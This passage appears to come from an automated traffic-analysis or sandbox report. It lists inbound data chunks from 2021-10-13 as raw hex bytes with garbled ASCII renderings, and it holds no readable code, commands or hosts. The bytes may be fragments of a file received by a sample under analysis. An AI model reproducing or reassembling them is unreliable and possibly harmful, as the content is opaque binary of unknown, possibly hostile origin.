53 d4 18 71 58 f1 87 00 c6 2c ef e8 13 09 41 5e c4 8d ae 4e 95 36 28 53 cf 70 21 0a 58 05 7d ee b3 18 9d af 57 0d 3d 32 36 ad 36 a6 d4 f3 17 Data Ascii: gm[2#hMuF]G@="PK2U6v%y>3lIM3Xx;TE-6C\| i&'RrbVDA6Ov%*@bxd6@!RgLp(r&.;HpSqX,A^N6(Sp!X}W=266
2021-10-13 11:06:38 UTC	123	IN	Data Raw: e2 6a bf 14 ba 44 84 6e 88 57 7f f7 b2 54 36 99 a8 e9 4c a7 6a 2e 98 5a 89 f0 f6 ad ff b5 a2 20 30 c1 3b 75 76 b5 cb e6 6d 15 55 e7 5d 1a 30 4f fb e6 ad e3 bb ed 27 22 50 95 59 af 86 d0 b5 6d 97 b7 ab d3 73 41 38 67 36 dc ad 05 a7 73 d7 da af 4a 0e 82 2e 33 b8 f5 c0 4c 31 44 e6 f7 04 2f 08 ce 4f b0 8d a3 36 b0 5a 7f a2 80 21 7d bb b3 73 e2 06 82 89 ee 26 f0 9f f2 3b b9 d9 85 91 06 78 13 07 3f fe ec e7 8a 94 ff 81 df b9 e2 2f fc 84 ef 9a 1b 09 df 94 d9 6b 80 ab 71 f7 5e 5e 18 a2 ca 7c 7b fa 66 c9 70 a7 8b 71 52 5f a5 de 9d ca 71 e4 83 24 7c 7a d7 aa 4a 49 89 06 47 9e ca 7e 44 3c d4 93 9d b4 76 1d 2b 97 a3 20 06 6e e8 ee c5 a7 da 4b f6 aa 4a 78 8b bf 91 50 39 ff 10 01 b7 76 dc 8d db 7c f4 af 10 b5 a8 8c 67 ed 85 9d f8 e9 b9 5f 3a dc 35 2b cc eb 42 7f c0 27 Data Ascii: jDnWT6Lj.Z 0;uvmU]0O'"PYmsA8g6sJ.3L1D/O6Z!}s&;x?/kq^^\|{fpqR_q$\|zJIG~D<v+ nKJxP9v\|g_:5+B'
2021-10-13 11:06:38 UTC	124	IN	Data Raw: 02 3b 7a 7b 9e 06 31 cf 8e 39 73 28 07 fa e6 b9 90 9b 62 20 f7 d5 68 66 aa 37 41 2a e7 a7 d7 0f 0f 24 43 b8 44 ae d8 25 54 5d 6d a2 f1 94 20 bc f7 35 d6 40 c9 22 bf fd 7a ff c9 b5 75 ba a0 b9 5d 92 92 4f 7b 21 80 ba 53 5f 73 00 00 5e 1a 6a 6c e7 7a ee 0f 0f 4c 96 d6 8d 5c 3c 37 8a 8f 28 d9 a1 46 ea 79 5e 1a be 74 93 43 56 f0 92 b3 d5 28 69 59 47 49 bf 62 5c 87 9a 34 83 01 28 77 e5 f1 df 69 d0 bd c9 be 65 44 6e 24 11 eb 2a f2 05 93 aa 13 ca fb 2b e3 b7 0e 63 cb 59 ce fe d8 4c 2b 93 bb 8e 31 72 ca cb e8 d5 41 9c ba c1 a2 d2 d5 9f 76 d2 96 ee 43 0c ab 81 a5 e5 39 f3 a8 2c 7f 2f 65 28 e7 c7 89 c8 f1 b1 71 98 0a c9 6a 81 71 f2 90 7f 39 28 57 6c d5 6a b3 c5 a0 08 27 e9 25 5c bb 05 63 a5 b0 d5 41 ec 6f 90 14 f6 0e d5 46 62 5e 68 0f bd 98 b8 f6 aa 34 c6 70 57 3a Data Ascii: ;z{19s(b hf7A$CD%T]m 5@"zu]O{!S_s^jlzL\<7(Fy^tCV(iYGIb\4(wieDn$+cYL+1rAvC9,/e(qjq9(Wlj'%\cAoFb^h4pW:
2021-10-13 11:06:38 UTC	125	IN	Data Raw: 0a fe 0c c1 11 cc 63 2b 13 4a 67 54 01 3a 99 cc d2 f9 71 8e a2 9d 59 d6 38 b7 50 0e 0e df 6e 1b e5 4c a6 68 fa eb 69 dd 09 b1 a8 6a ce 3c f0 89 7b e7 11 0b 6d a8 ff af 09 73 0d 84 82 90 cf 25 02 e9 8a 0d ac bc bc 4d 50 d0 bf 1a 65 c9 30 c7 9b d4 96 82 70 18 1d ae fd 94 4c 31 bd 65 e6 64 80 07 d0 9f 70 ed 9d 61 bd f1 cf f1 28 aa e0 07 76 78 b6 c0 f9 33 19 52 bc 52 1a 30 4f c2 94 c2 6a b2 82 0b 3f 5a 09 6d 92 9b fa 82 4a 8d d3 b2 f0 75 6e 3a 61 18 1a f1 7b 34 1d f3 dc b0 47 85 b7 12 33 b6 c7 ce 53 58 75 e0 d8 06 29 26 08 2f ce 1e cd 10 b6 45 75 29 b5 0f 1e b7 ae 7f fb 72 8c 85 a9 1d f3 9f fe cf d8 82 34 a7 06 7c 06 19 b1 f3 f9 e8 ac 81 2c a1 40 b3 f5 f9 f0 84 d6 bd 08 1e e7 cb 49 ea e6 bb 64 e4 97 43 97 96 f2 62 4b 6b df d6 03 5a 74 8e 4b 7f 8d b2 ab ca 77 Data Ascii: c+JgT:qY8PnLhij<{ms%MPe0pL1edpa(vx3RR0Oj?ZmJun:a{4G3SXu)&/Eu)r4\|,@IdCbKkZtKw
2021-10-13 11:06:38 UTC	127	IN	Data Raw: 3c ec b7 da ad 08 7d ba 50 76 e5 cd 19 83 c3 b2 eb 7b ef 80 e1 b7 b6 b7 8e 8f 48 08 b7 f8 77 4f 3d db d5 5f 12 38 4f 60 50 92 e0 8a ef ee 65 7b 38 c3 9e 1d 10 78 50 ad 22 08 84 21 eb f2 8f 77 47 01 ad 4e 55 ad f1 80 77 23 43 67 cb 9b 3b 20 7d 7f 2b e7 ea a3 35 57 34 42 a1 76 bb 94 99 7d 75 a6 d6 68 64 aa 5d 2c 83 e2 a7 39 10 36 be 6e 94 4a 99 c5 e2 61 86 6f a2 f3 8a 76 a4 f5 35 d4 17 dd 5d 26 f8 78 2b 9b 8f ef 9d a5 a3 7b 8d a2 47 e7 22 80 b0 33 0a 5f 02 04 5b 24 fe 13 68 85 ef 01 16 5b 21 f1 a3 dc ad 55 31 ae 8b df a3 44 88 d1 72 18 ba 5a e1 2f 28 63 ee cc d0 37 51 c0 74 66 cb 3b 42 bb be 90 fa 81 29 68 e8 f1 1f 69 d0 b1 e7 c0 e5 dc 79 da 14 ff 10 44 0d bc a0 bb 62 bb 89 4d b5 0a 61 de 0a 61 fd d8 4e 29 a1 c7 17 3a 0f 4f d5 d6 4b 60 a7 b6 9c 3c ed f5 2b Data Ascii: <}Pv{HwO=_8O`Pe{8xP"!wGNUw#Cg; }+5W4Bv}uhd],96nJaov5]&x+{G"3_[$h[!U1DrZ/(c7Qtf;B)hiyDbMaaN):OK`<+
2021-10-13 11:06:38 UTC	128	IN	Data Raw: dd bd c6 e3 73 ba d4 d5 6c 30 ba 21 7b 40 4d cd 2e be 2b 2f da b5 0a 0f ac 00 13 5c 13 f4 3f 55 45 bd 3c 98 63 2d 99 42 56 2c fc 6f 11 a6 e3 23 b5 04 99 be bc e9 02 e9 b5 ab 80 57 eb 7d 12 92 37 d3 cf 26 be f5 af ba 3d d7 fb c1 ae 3d ef 02 c4 5e c1 cb 2f 15 60 2a 02 b5 39 99 ce e3 0d 2a 3a a9 bb 46 d6 7c 37 5d 0e 03 f9 77 59 9f 9d 3b 69 fa f0 7a 6f 01 9e a3 4a f8 49 be 0f 76 cf 38 16 04 34 f0 d8 79 cc 13 ed a6 33 51 00 2f f9 84 3d b1 80 a5 68 16 83 24 1b 63 e7 75 d3 98 f0 bb 89 48 9d 52 a3 35 b6 52 2e e9 5f c3 61 af 05 d6 b3 34 f1 7a f9 bc f5 d4 85 bb 15 e8 25 5c 41 c2 e9 0e 6f 06 5e 8b 74 30 1d 4b e8 f0 96 9d cd 1b 0e 20 54 8c 24 25 b2 f1 92 66 8d db 8d 08 59 43 38 7e 0b 18 82 07 ad 1a d9 b2 d1 d5 1e 92 3b 27 fd 42 e0 61 39 4a d7 98 24 21 25 22 4d ac af Data Ascii: sl0!{@M.+/\?UE<c-BV,o#W}7&==^/`9:F\|7]wY;izoJIv84y3Q/=h$cuHR5R._a4z%\Ao^t0K T$%fYC8~;'Ba9J$!%"M
2021-10-13 11:06:38 UTC	129	IN	Data Raw: 91 1d c7 53 54 f3 7d ae c1 71 c1 a4 6e c7 12 b4 0b 87 ff 92 2d 98 a5 22 39 21 98 c5 01 4e 71 4e 7f df 27 c0 db c2 4f d1 5b 58 20 53 52 82 3c cd cc 99 1b f5 32 db a8 8f a1 b8 b1 a8 44 0d eb 02 9b 2e e9 be fc 45 27 f3 9d dd 49 a4 96 b1 d9 2d ff a0 7b 5c a5 65 4e 49 e2 1b 83 db b0 44 07 76 87 cb d9 e8 bd 8f 8f 4c 8d a4 4f 43 44 13 6e ca 69 32 94 32 67 50 8a d5 8f c0 ec 63 57 78 3f 79 85 11 7c 4b ba 2c 2d a9 2f 57 c8 95 46 ef 23 39 4e 4c 85 fc 04 70 25 69 13 9d 2f 38 20 7f 4a 91 03 56 8f 3b 75 0b ef 81 e7 b9 0e bc 4b 4c ad f4 fd 62 80 37 72 94 e4 a7 3d 18 27 09 49 b9 42 95 58 a5 d8 11 6d a6 d3 00 5e 89 f7 af f7 10 a6 05 9f 6f 78 2f 84 95 fa bf 88 ad 4a ba b5 65 7b 26 aa 32 50 bb 73 00 00 7d 99 94 6d f1 1e ca 28 18 46 9b 43 8e d2 8b 6a 9a 89 28 dd b9 6c bc fb Data Ascii: ST}qn-"9!NqN'O[X SR<2D.E'I-{\eNIDvLOCDni22gPcWx?y\|K,-/WF#9NLp%i/8 JV;uKLb7r='IBXm^ox/Je{&2Ps}m(FCj(l
2021-10-13 11:06:38 UTC	130	IN	Data Raw: ae 9e 5e e3 ea ac d3 84 80 a3 af 99 f3 13 9c d2 2d ee 89 a4 97 26 57 dc c0 d6 e1 0c d4 a7 41 c3 1c 40 f7 ee 99 fe 5d 25 ec e8 38 46 05 5f c4 8b 98 96 4f 34 28 43 88 a1 22 0a 58 38 90 42 28 19 97 c4 8b b5 3d 34 21 58 c1 89 c5 df 58 10 b9 c6 e3 4c 21 f4 f8 6e 27 94 26 13 3e d2 e6 ac c4 ad 4b 40 94 07 bb 8a 1f 76 e6 a2 dd 2e 73 79 2f 11 9a 63 0b 0f 24 28 b5 e7 47 38 bb 85 bf ba ab e8 01 a2 8f 26 53 0a ab 80 48 61 70 12 81 11 f5 5e 4c c0 6c 8e 7a 31 c8 9c 47 a3 3d e3 24 dd 13 67 1f b2 14 60 35 0a 24 3b 99 c8 53 46 79 b1 8e 9b fe c9 14 ad 58 e5 04 df 68 2e b2 1a 12 6b fa e9 5f c1 52 05 a2 4c d6 03 7d 96 77 cf a6 2c 40 bc f3 d5 ca ea 0c 84 a6 5e 5d 00 2f fd b7 38 9e 82 a3 44 52 7f c3 83 62 e3 6e 99 bc d5 96 86 f4 a7 15 92 d0 92 ec 2e f6 7a cb a2 a5 05 d0 83 72 Data Ascii: ^-&WA@]%8F_O4(C"X8B(=4!XXL!n'&>K@v.sy/c$(G8&SHap^Llz1G=$g`5$;SFyXh.k_RL}w,@^]/8DRbn.zr
2021-10-13 11:06:38 UTC	132	IN	Data Raw: fb a2 0c 51 2b d7 ac 60 c4 f7 9f 46 c0 ce 5e 9a 2e d4 93 07 8b 5b 0f 0c b7 7d 20 06 f3 c8 31 c9 ca db 54 d7 88 65 7a 8b b6 bb d6 47 7c 11 01 b2 4d 33 84 db 26 6f 8a 3d a2 8f ac a9 ef 8f 9f ce 86 55 5e 3a c9 08 5c d2 e1 40 6e 85 a9 cf 14 c6 53 50 49 b8 83 d0 57 7b 11 43 d5 34 b4 9e 80 ff 92 17 92 85 20 39 38 90 6f 52 d5 70 48 51 79 c8 59 da c2 d1 d4 97 49 06 73 59 a7 11 df ca c0 fd f5 32 c1 a0 e6 ae b8 b7 9d e4 5b 5f 01 9b 2c e3 ae 82 dc 26 69 bc d0 ba 82 b6 23 43 08 d2 91 20 7b 47 65 56 61 ef 7f 8e dd 9a db 51 c2 84 cb db e2 a8 f1 16 4d 17 85 42 b1 62 33 fd 50 4c 1f a6 6b 40 b3 8a c8 a7 cd 83 6e 51 52 a2 24 34 3d 7e 4f 9c 92 ab d7 b6 cc ed bc 77 2d 03 ad 4e d6 a0 f1 90 51 05 8d 0d b5 02 1a b0 74 60 13 62 c4 a6 16 73 2b 7c ab 61 c7 0d 98 66 59 ab 31 68 62 Data Ascii: Q+`F^.[} 1TezG\|M3&o=U^:\@nSPIW{C4 98oRpHQyYIsY2[_,&i#C {GeVaQMBb3PLk@nQR$4=~Ow-NQt`bs+\|afY1hb
2021-10-13 11:06:38 UTC	133	IN	Data Raw: 5c 84 16 ef 45 22 01 12 3e e4 33 f2 9c d7 7f 39 9b b3 ce e2 b4 a9 d3 b1 fe 2f 77 6d 91 8f 75 f0 8f 2c 90 2b 57 6e d7 b0 cf 5c ab 75 a0 c8 23 59 be 13 fb fb 1e c5 67 c8 6b ea 90 f7 2e d0 61 8f 5c 73 2d 92 9f 36 47 fd 30 b9 e9 52 38 8a 09 59 e2 ea 36 6c 8c bc 94 a9 0e f4 12 9c f2 bb e0 86 a4 80 12 52 f3 c2 d0 cd a4 2c 40 d9 c2 18 64 6f e6 98 fe c7 9a e4 d4 0c 40 9d 57 c5 8b b8 01 4b 3b 28 59 bf 94 08 27 5c 12 14 16 37 66 0e c1 ab 08 1d 3d 20 c2 e4 3e f1 d4 6a 8f 99 cf e2 6c 9a dc dc 61 30 bc 14 0a 16 f9 ce 2e bc 1e c8 3e 09 26 01 8e 3f 7c 7d 87 f0 a5 70 74 84 37 ba 69 2a b3 2c 08 8a f2 6f 15 a5 ad 94 92 29 90 b2 25 f1 bb 72 b1 af a0 43 fa 55 3f 0a 12 f8 f7 6a e0 67 af ba 39 e8 d9 54 8b 10 fe 2f f3 14 e3 61 2d 3f e6 4f b3 99 3b 9d e8 c5 62 54 a3 32 9e 6f db Data Ascii: \E">39/wmu,+Wn\u#Ygk.a\s-6G0R8Y6lR,@do@WK;(Y'\7f= >jla0.>&?\|}pt7i*,o)%rCU?jg9T/a-?O;bT2o
2021-10-13 11:06:38 UTC	134	IN	Data Raw: cc 10 92 95 69 b3 90 3d 1b b9 9c 71 e4 06 b9 1f ff a9 f0 9f fc c5 9a fd ad a6 9c 5d 34 06 0d f6 f8 e6 8a 9e 01 59 de b3 f5 e6 cf a6 d3 92 0a 18 cb 63 59 0d 7e ba 60 c0 a5 4c 0d b3 45 48 40 65 f7 d6 b6 5b 74 8e 74 8d b5 9f a9 d4 59 c9 81 24 7a 03 51 d4 d3 43 89 02 67 ee cb 7e 44 b4 f1 be 8f 88 56 33 2b 97 a3 00 06 e2 e8 ee da dd f3 66 f4 a0 4e 52 0d ce 08 51 39 e1 30 2e b7 6d ec 1e fe 0b e7 89 30 9f a8 8c 76 cf 98 8e ee 86 47 48 12 fb 28 74 f9 c9 c6 16 36 2e b1 89 e7 63 55 69 58 19 f5 7a f3 12 4e f7 13 94 7e a0 d2 83 37 b0 97 2c 11 0a b0 47 79 fd f6 30 e2 fe b6 c4 fb f3 d4 f4 76 d3 23 5e d1 a4 1c fc ed e0 1c d5 0b d0 80 a2 bc b1 9f af c4 73 74 29 19 54 50 2d fc 41 07 5b b9 f0 58 18 93 0e c8 0b df b2 07 5b a5 45 14 70 cf 19 9e f5 b7 c4 79 e9 ac 4d a3 51 2f Data Ascii: i=q]4YcY~`LEH@e[ttY$zQCg~DV3+fNRQ90.m0vGH(t6.cUiXzN~7,Gy0v#^st)TP-A[X[EpyMQ/
2021-10-13 11:06:38 UTC	135	IN	Data Raw: 5f 1e 9a 0e ca 41 56 60 ca e1 c5 0e 4d 08 50 4b c4 3d 55 93 9e 36 e6 a9 04 75 e1 df 18 ed ae 2e cc aa 9f 65 2b db 10 e0 b7 fb 05 83 88 bd 2e 87 a9 e2 97 1a 75 c9 22 53 ef f0 65 01 cb bf a4 bd 71 d2 cb e8 d5 65 de b9 ba 23 49 f0 b6 66 8f 34 bb 42 08 83 4c 87 f1 33 f6 a3 c2 56 14 99 29 ed e5 23 f1 6a b5 ff 2b 57 18 6a 81 75 6a b7 29 af 0f 77 3d fc 32 b1 e5 9a 61 a4 e8 3a 53 96 3e 63 de 35 fe c7 96 f4 ea 90 f3 2e 87 6f 8f 5c f2 20 92 8f 10 61 81 b3 c7 70 73 03 9a 29 5e fc ff 1e db ab 91 83 a5 ac 8d 8a 9d f2 9f c6 de a5 80 0e e0 fb ed c1 ed ae fd 3f 40 c3 38 30 5b ee 99 e3 ef 2d c3 f9 18 4c 3f 21 5d 8a b8 25 67 6c 29 59 a0 16 05 27 4f 34 32 64 b0 18 97 e0 fc 18 3d 34 3b ea c9 a6 d4 ff 52 2b c7 5f e2 6c 9e dc a1 6f 30 bc 91 34 13 c5 ea 0e e3 35 4a 40 b0 7c 15 Data Ascii: _AV`MPK=U6u.e+.u"Seqe#If4BL3V)#j+Wjuj)w=2a:S>c5.o\ aps)^?@80[-L?!]%gl)Y'O42d=4;R+_lo045J@\|
2021-10-13 11:06:38 UTC	137	IN	Data Raw: 8d e3 fe 96 73 b5 77 20 30 c1 0a 03 5f a9 c9 7c 4e 2b 4f b2 5f 61 31 49 e8 d6 ec e5 b3 82 13 08 7d 91 48 b9 bd 5a e3 d9 93 b7 a9 db 27 42 38 61 84 15 82 17 8b 3c 89 d9 af 4c 3f c4 29 38 90 c7 d4 64 1a 6e c8 f3 2e af 5e bb 4c b0 83 ec 6b b3 5a 79 29 b5 0f 00 b7 91 08 e5 00 93 b9 e6 26 f1 9f e7 fb 9e d1 af a6 00 52 9f 6a b2 d7 d4 e3 aa e2 20 81 ce 29 d0 d4 fd a8 de ec 0b 1e e1 c1 a2 82 7f ba 7b ee a0 60 0f b3 d9 47 ef 0a 48 f7 9b 5e 54 f3 55 75 a5 05 8c e7 60 c2 a3 59 7d 29 d7 8a d9 54 89 06 59 e8 e7 7c 44 28 fe 15 e3 37 77 1d 2e b7 dd 21 06 f3 72 cb e8 d8 fd 6b 88 a1 48 78 ab 2b 87 50 39 fa 1e 29 9b 6f ec 82 f1 a0 8b 36 11 b0 ad ac 09 ee 8f 9f 74 a3 75 4c 1c f6 55 75 ff e3 60 c1 b9 2f b1 92 db 7b 79 6b 58 85 fa d1 9f ad 6f c7 16 b4 fe 81 ff 92 ad 95 a5 32 Data Ascii: sw 0_\|N+O_a1I}HZ'B8a<L?)8dn.^LkZy)&Rj ){`GH^TUu`Y})TY\|D(7w.!rkHx+P9)o6tuLUu`/{ykXo2
2021-10-13 11:06:38 UTC	138	IN	Data Raw: 80 17 1d 02 e3 a7 25 27 22 26 4b bf 6e 3d a4 42 40 10 69 82 53 97 5e 89 6d 10 ff 2c 91 03 1f f8 78 2f a4 e4 6d b8 88 b3 75 bf 9a 67 7d 0a 06 ce b7 23 72 04 24 fc 0f 94 6d 6b a1 c2 17 2f 40 1a d5 8e d2 ab 13 12 8e 28 c2 b2 6c bc fb 5f 1c 90 de b5 d8 57 fa eb ec 76 29 6d 5a cb 6e e9 0c 7b a7 3c 37 f8 81 09 1d f9 d9 32 77 f8 9a cf aa 9d 6f fe a4 89 e1 2d da 08 32 af 9d 7d 1c 8c cf a5 2c 41 6a 23 4c ff f8 38 1b cb b9 91 36 27 66 c8 e8 d7 6f 0c c6 23 22 d3 d1 bb d0 a8 14 ef d9 2d ae 7e 81 c5 97 f7 bc d2 5e 44 83 29 eb d0 ab a7 de b6 ff 29 5d cb 15 18 74 f0 96 24 18 28 57 68 67 17 9c d7 8c 55 01 e9 25 58 9e 98 79 de 33 cb 4c c0 40 e9 90 f1 24 53 10 16 5d 68 01 9f 3b 37 41 d7 28 e2 5d 42 1e ae 8f 5f e3 ea 16 6e b1 91 85 95 06 de 11 9c f4 b1 64 f7 3d 81 0e 7e fe Data Ascii: %'"&Kn=B@iS^m,x/mug}#r$mk/@(l_Wv)mZn{<72wo-2},Aj#L86'fo#"-~^D))]t$(WhgU%Xy3L@$S]h;7A(]B_nd=~
2021-10-13 11:06:38 UTC	139	IN	Data Raw: ed b4 78 23 13 c2 40 1c bd 32 39 43 78 91 ec 46 2c 98 83 8b d3 23 c0 0c 52 e2 2d 2f 4d 69 d4 f5 77 ca 1a 9e 86 8d 49 28 02 e0 ac 16 99 02 dd db 79 fd b9 3a ab e2 6a b9 98 f0 bb 97 48 a2 f0 82 f6 b2 72 32 ec 7a eb 52 85 28 d2 99 5c a5 65 86 25 f0 cb ea 01 f9 c4 2a 7a c4 8c e4 f4 4d 26 97 95 7f 18 10 6d f2 f6 bc ec ba aa 22 22 50 95 62 39 e9 45 9c 40 96 97 67 fa 5d 43 a2 44 33 22 89 25 67 1d f3 d8 8f 61 05 92 3f 27 84 f0 e8 4e 37 6a e2 77 7a b0 21 22 49 90 4c cd 10 b2 c0 5c 9e 81 04 32 5a b0 73 e4 20 d2 83 81 30 e8 b7 d5 e7 b6 fa 87 24 78 e1 18 14 2f f6 18 e6 8a 9e bb a4 e3 a2 d3 d9 23 8f fe 90 2a 5a fb e1 27 8f 57 97 66 e0 8e 67 8f cd 46 6c 6d 70 f1 3b 9a 5a 74 14 71 58 b4 b9 89 07 70 e4 83 04 35 33 d7 aa 51 6a a4 04 47 c6 e0 fc 3a b7 d5 93 99 8e b8 1c 2a Data Ascii: x#@29CxF,#R-/MiwI(y:jHr2zR(\e%zM&m""Pb9E@g]CD3"%ga?'N7jwz!"IL\2Zs 0$x/#Z'WfgFlmp;ZtqXp53QjG:*
2021-10-13 11:06:38 UTC	141	IN	Data Raw: 8e 8f 4c 37 70 79 52 62 2c cf e2 44 30 b4 4b 4a d6 f4 51 a6 ed ea 43 bf 53 bd 07 86 35 51 5d bc 98 c3 a8 2f cd cd 9b 4b c9 03 b2 44 64 a8 de 82 71 0f ef 73 2c 03 3a 24 59 8f 12 7d cf 14 1e 5c 39 5c a1 08 b8 94 99 46 70 97 d4 68 7d 8b 1f 7f 18 e3 a1 17 8d 71 bd 4a b9 40 9f 2a da 41 10 f7 87 de 87 78 a9 07 34 d2 3d 97 1b a3 f9 78 33 ac 98 77 b8 8e 87 df ec 01 66 7b 24 a0 41 2f 22 72 9a 21 70 1f b2 4d 00 85 ef 05 29 5e a7 d4 8e cf a3 67 08 8e 2e f7 21 3a 08 f8 5f 1e 9a ae ca 41 56 60 ca e1 c5 0e 4d a8 50 4b c4 3d 18 9b 9e 36 e6 a9 04 75 e1 df 18 e9 ae 2e cc aa 9f 65 8b db 10 e0 b7 fb 05 80 88 bd 8e 87 a9 e2 97 47 7d c9 22 51 d7 f5 4a 03 cd 93 08 45 96 4a ca ec f1 b1 8b b8 ba b9 f6 f8 89 52 89 e0 ee 43 08 a3 38 bb e5 33 e9 9d fa 53 3b 9b 2f c1 4d db 16 f2 b4 Data Ascii: L7pyRb,D0KJQCS5Q]/KDdqs,:$Y}\9\Fph}qJ@*Ax4=x3wf{$A/"r!pM)^g.!:_AV`MPK=6u.eG}"QJEJRC83S;/M
2021-10-13 11:06:38 UTC	142	IN	Data Raw: 9b 39 56 68 85 f0 3f 75 a8 88 11 9a 7d 03 9e 2e 28 b3 d7 ed 6b 20 84 b9 94 09 83 9a a3 8f b8 56 9c ba a6 68 ee 57 3f 90 17 2c f8 4c c0 77 86 97 3b c8 9a 71 0d 6e 78 25 db 3d c1 77 29 15 60 ab 0f b5 29 bf e8 df 61 54 a3 88 45 5f c9 14 b2 38 0b 21 dd 68 37 95 b4 41 f0 fb ef 71 67 3b 9e a3 4c 48 06 ed 84 51 ef 2b 0b 6d ae f5 cb 69 ea 0c 9b 8f a5 78 02 2f e4 86 96 cd 19 a2 42 7c dd a5 18 63 e3 f0 9c 2f c7 b0 a6 76 80 38 83 d6 f5 4c 2e f6 65 e7 64 80 07 d0 9f 70 0d 9d 61 bd f1 cf ce 38 32 c5 2a e0 7b 84 d8 c0 4b 1f 5c 94 7f 38 63 57 e8 f6 a5 db 9e 80 0f 26 7a 11 36 26 96 dc 99 60 88 b5 ad fb c7 66 15 70 38 10 b5 07 ad 1c d3 8e b1 4c 1f 8b 17 15 92 d8 c3 66 b5 12 51 f4 04 2d 00 39 4f b0 87 56 35 9f 4b 5f 93 8b 20 12 91 91 2a fa 00 93 85 a9 1d f3 9f fe cf 30 82 Data Ascii: 9Vh?u}.(k VhW?,Lw;qnx%=w)`)aTE_8!h7Aqg;LHQ+mix/B\|c/v8L.edpa82{K\8cW&z6&`fp8LfQ-9OV5K_ 0
2021-10-13 11:06:38 UTC	143	IN	Data Raw: 19 1c b0 47 7f 4d 55 63 69 d9 96 fb d9 c2 d5 d4 d8 68 06 73 dc 94 14 e0 ee e0 1a df b4 bf 19 a3 a3 bc 97 be c4 73 72 99 be 07 db 0a dc 79 25 69 b8 d0 9c a3 b6 23 c6 21 d7 ad 04 5b a3 4f d4 1f 56 18 83 d9 ba fb 7b ef 86 51 f8 e5 3f a9 af 71 15 81 62 72 b2 12 fd ca 73 1a 99 4f 60 56 a0 4a d9 74 ef 63 55 72 83 05 1c 10 e6 6a b7 a9 0b 89 11 cf ed b8 77 1d 22 ad 4e 51 ad f1 80 77 23 43 8f cb 9b 3b 20 7d 40 2c 7f cf 8e a1 54 06 6b a7 c7 86 96 99 66 7d 50 f5 68 62 9e 1f 7f 18 e3 a1 17 8d 71 bd 4a b9 40 9f 9a d9 41 10 f7 87 de 87 78 a9 b7 37 d2 3d 97 c0 9e f9 78 31 ac 98 77 b8 8e 87 db ec 01 66 7b 24 a0 f1 2c 22 72 9a 21 70 1c b2 4d b0 86 ef 05 29 8b 9a d4 8e cd 85 62 27 8c 28 db 89 c2 ef 60 5e 1a be 7c 89 43 56 fa 75 e9 f9 3a 4b 7a 13 49 c4 1d 7d 7e bf 36 f8 9e Data Ascii: GMUcihssry%i#![OV{Q?qbrsO`VJtcUrjw"NQw#C; }@,Tkf}PhbqJ@Ax7=x1wf{$,"r!pM)b'(`^\|CVu:KzI}~6
2021-10-13 11:06:38 UTC	144	IN	Data Raw: 59 d1 cb 8a 8a 5c 42 c3 18 fa 6a c3 8b d8 e7 62 c3 f9 1e 46 bf 7b c4 8b a7 2d 6f 19 2a 59 a6 a6 a6 74 c7 13 12 38 91 7b 95 c0 ab 96 18 19 33 e4 c4 c7 d6 f9 78 89 b7 e2 e3 6c 85 ea d0 43 32 bc 0d 3b bc aa 55 2f ba 30 6a 24 92 27 01 10 3a 5b 6d a1 d0 5b 57 59 95 31 be 47 2b b3 3b 00 98 ff 6f 13 93 07 c7 09 28 96 9c 83 ea 20 73 b1 31 a5 65 ea 73 1f f5 35 d5 e5 6c e5 48 ae ba 2e e0 b1 59 8b 16 cb a2 a5 a0 e0 61 2f 35 06 33 2a 98 a1 bc e5 db 45 74 c5 aa bb 42 e9 32 89 78 23 13 d5 40 1c bd 32 39 43 78 91 ec 46 2c 98 83 2b d0 23 c0 0c 52 e2 2d 2f 4d c9 d7 f5 77 ca 3c a0 86 8d 4f 28 02 e0 ac 16 99 06 dd db 79 fd b9 3a 0b e1 6a b9 98 f0 bb 94 48 a2 50 81 f6 b2 72 1a d2 7a eb 53 bb 2d fd 9b 5a 89 c9 7e c2 68 ca ee 25 10 ac 28 7a 5e 33 ec cb 79 20 7e fd 7d 18 30 69 Data Ascii: Y\BjbF{-oYt8{3xlC2;U/0j$':[m[WY1G+;o( s1es5lH.Ya/53EtB2x#@29CxF,+#R-/Mw<O(y:jHPrzS-Z~h%(z^3y ~}0i
2021-10-13 11:06:38 UTC	146	IN	Data Raw: 97 a3 3e 2e de ea ee c3 e0 5d 35 6f a1 48 7c ab 39 93 50 39 7f 35 2c a4 4b cc 0d d9 26 f5 8f 4f 96 a9 8c 69 e6 a7 b2 ec 86 5e 74 b8 a8 b3 75 ff e7 60 e2 ad 2f b1 17 e2 7e 45 4f 78 09 d2 57 e1 14 06 e1 12 94 62 a8 d2 90 37 b6 a2 a2 47 be b3 47 7b f7 fb 4c 7b ff 2c e5 f6 d3 f3 d4 fd 4b 06 73 e3 ec 1a cd ec fd 34 d8 30 c1 86 88 25 c6 2e 83 c6 77 52 8f 99 2a c9 b6 d9 68 35 4f 98 7c 5a 82 b6 03 ac 0b ff 80 19 55 8d 48 54 61 c9 33 05 a3 03 c7 79 eb a6 46 df c8 2e 15 aa 61 05 a7 42 df 60 33 fd ea ea 14 b4 Data Ascii: >.]5oH\|9P95,K&Oi^tu`/~EOxWb7GG{L{,Ks40%.wR*h5O\|ZUHTa3yF.aB`3
2021-10-13 11:06:38 UTC	146	IN	Data Raw: 4d 7f 46 a2 e5 a5 ed e8 49 d7 2c 24 06 1c 14 5c c1 98 b8 2d 33 0a e0 ff 9e 77 47 01 ad 4e 6c 1c fa 82 77 3a 7c 25 98 00 3a 26 53 e2 6d e4 ce 8e 3f 51 a4 78 81 e7 23 b1 b4 77 7b ab 5b 6a 62 80 17 fc 3c e3 a7 2a 27 22 26 4b bf 6e 3d a4 42 40 10 69 82 63 94 5e 89 6d 10 ff 2c 91 03 2f fb 78 2f a4 1a 53 b8 88 b5 75 bf 9a 67 7d 0a 02 ce b7 23 72 04 24 cc 0c 94 6d 6b a1 c2 14 2f 40 2a d6 8e d2 ab fb 2c 8e 28 ca 8b 69 93 f9 59 30 38 22 52 40 56 fe cf 5e d6 28 6d c0 74 66 d5 3b 7d 15 9c 36 f8 a1 9b 51 e1 d9 2a 43 fd b5 cd ac b1 c7 06 43 11 e0 29 fe bb 93 ae 9d e7 a3 84 f3 91 2a f2 cb 22 4c df 6c 6e 03 cb ae a6 16 0d 4b cc c2 53 3b 13 b9 ba 27 f3 41 99 74 a9 8e ca 6e 19 a5 4c 33 e7 33 f6 9c 67 58 39 9b 31 c3 e2 a7 8f f5 9e 7d 51 ee 4c 6b 85 55 65 90 04 bd b3 72 45 Data Ascii: MFI,$\-3wGNlw:\|%:&Sm?Qx#w{[jb<'"&Kn=B@ic^m,/x/Sug}#r$mk/@,(iY08"R@V^(mtf;}6QCC)"LlnKS;'AtnL33gX91}QLkUerE
